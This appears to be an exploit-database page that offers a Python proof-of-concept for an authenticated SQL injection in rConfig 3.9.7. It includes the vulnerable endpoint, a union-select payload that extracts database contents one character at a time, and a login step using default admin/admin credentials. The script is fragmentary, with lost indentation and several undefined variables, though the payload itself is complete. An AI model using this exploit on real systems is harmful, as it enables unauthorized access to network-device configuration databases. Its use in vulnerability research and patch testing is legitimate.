Exploits / Vulnerability Discovered : 2023-03-31 |
Type : webapps |
Platform : php
This exploit / vulnerability Rconfig 3.9.7 sql injection (authenticated) is for educational purposes only and if it is used you will do on your own risk!
# sys.argv.append("192.168.10.150") #Enter the hostname
if len(sys.argv) != 2:
print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
sys.exit(1)
host=sys.argv[1] #Enter the hostname
def get_data(host):
print("[+] Get db data...")
vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
query_exp = "database()"
result_data = ""
for i in range(1, 100):
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
# print(res.text)
data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
get_data(host)